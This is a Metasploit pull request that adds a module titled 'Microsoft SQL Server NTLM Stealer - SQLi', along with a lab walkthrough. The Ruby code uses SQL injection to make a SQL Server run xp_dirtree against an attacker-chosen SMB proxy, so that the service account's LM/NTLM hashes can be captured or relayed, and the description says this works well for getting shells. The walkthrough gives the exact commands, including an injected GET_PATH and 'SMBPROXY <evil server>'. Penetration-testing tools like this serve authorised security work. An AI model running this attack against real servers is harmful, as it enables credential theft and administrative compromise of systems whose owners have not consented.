### PR TITLE
Microsoft SQL LM/NTLM Stealer - SQLI

### DIFF
--- a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb
+++ b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb
@@ -1,0 +1,61 @@
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Rex::Text
+	include Msf::Exploit::Remote::MSSQL_SQLI
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Microsoft SQL Server NTLM Stealer',
+			'Description'    => %q{
+				This module can be used to help capture or relay the LM/NTLM
+				credentials of the account running the remote SQL Server service.
+				The module will use the SQL injection from GET_PATH to connect to the
+				target SQL Server instance and execute the native "xp_dirtree" or
+				"xp_fileexist" stored procedure.   The stored procedures will then
+				force the service account to authenticate to the system defined in
+				the SMBProxy option. In order for the attack to be successful, the
+				SMB capture or relay module must be running on the system defined
+				as the SMBProxy.  The database account used to connect to the
+				database should only require the "PUBLIC" role to execute.
+				Successful execution of this attack usually results in local
+				administrative access to the Windows system.  Specifically, this
+				works great for relaying credentials between two SQL Servers using
+				a shared service account to get shells.  However, if the relay fails,
+				then the LM hash can be reversed using the Halflm rainbow tables and
+				john the ripper.
+			},
+			'Author'         => [ 'nullbind <scott.sutherland[at]netspi.com>', 'Antti <antti.rantasaari[at]netspi.com>' ],
+			'License'        => MSF_LICENSE,
+			'Targets'        =>
+				[
+					[ 'Automatic', { } ],
+				],
+			'DefaultTarget'  => 0,
+			'Platform'      => [ 'Windows' ],
+			'References'     => [[ 'URL', 'http://en.wikipedia.org/wiki/SMBRelay' ]],
+		))
+
+		register_options(
+			[
+				OptString.new('SMBPROXY', [ true, 'IP of SMB proxy or sniffer.', '0.0.0.0']),
+			], self.class)
+	end
+
+	def run
+
+		# Reminder
+		print_status("DONT FORGET to run a SMB capture or relay module!")
+
+		# Generate random file name
+		rand_filename = Rex::Text.rand_text_alpha(8, bad='')
+
+		# Setup query - double escaping backslashes
+		sql = "exec master..xp_dirtree '\\\\\\\\#{datastore['SMBPROXY']}\\#{rand_filename}'"
+		print_status("Attempting to force backend DB to authenticate to the #{datastore['SMBPROXY']}")
+
+		# Execute query to force authentation from backend database to smbproxy
+		mssql_query(sql)
+	end
+end

--- a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb
+++ b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb
@@ -7,13 +7,13 @@ class Metasploit3 < Msf::Auxiliary
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Microsoft SQL Server NTLM Stealer',
+			'Name'           => 'Microsoft SQL Server NTLM Stealer - SQLi',
 			'Description'    => %q{
 				This module can be used to help capture or relay the LM/NTLM
 				credentials of the account running the remote SQL Server service.
 				The module will use the SQL injection from GET_PATH to connect to the
 				target SQL Server instance and execute the native "xp_dirtree" or
-				"xp_fileexist" stored procedure.   The stored procedures will then
+				stored procedure.   The stored procedures will then
 				force the service account to authenticate to the system defined in
 				the SMBProxy option. In order for the attack to be successful, the
 				SMB capture or relay module must be running on the system defined


### PR DESCRIPTION
This module can be used to help capture or relay the LM and NTLM credentials of the account running remote SQL Server services. The module will use the SQL injection from GET_PATH to connect to the SQL Server instance and execute the native "xp_dirtree" stored procedure. The stored procedures will then force the service account to authenticate to the system defined in the SMBProxy option. In order for the attack to be successful, the SMB capture or relay module must be running on the system defined as the SMBProxy. The database account used to connect to the database should only require the "PUBLIC" role to execute. Successful execution of this attack usually results in local administrative access to the Windows system. Specifically, this works great for relaying credentials between two SQL Servers using a shared service account to get shells. However, if the relay fails, then the LM hash can be reversed using the Halflm rainbow tables and john the ripper. Thanks to "Sh2kerr" who wrote the ora_ntlm_stealer for the inspiration.

---
## Lab Process Example:
#1 Setup SMB capture or relay listener:

use auxiliary/server/capture/smb
run
#2 Run new module to obtain LM/NTLM hashes or shell via basic SQL injection:

use auxiliary/admin/mssql/mssql_ntlm_stealer_sqli
set RPORT 80
set RHOST 192.168.1.100
set GET_PATH /employee.asp?id=1;[SQLi];--
set SMBPROXY <evil server>
run
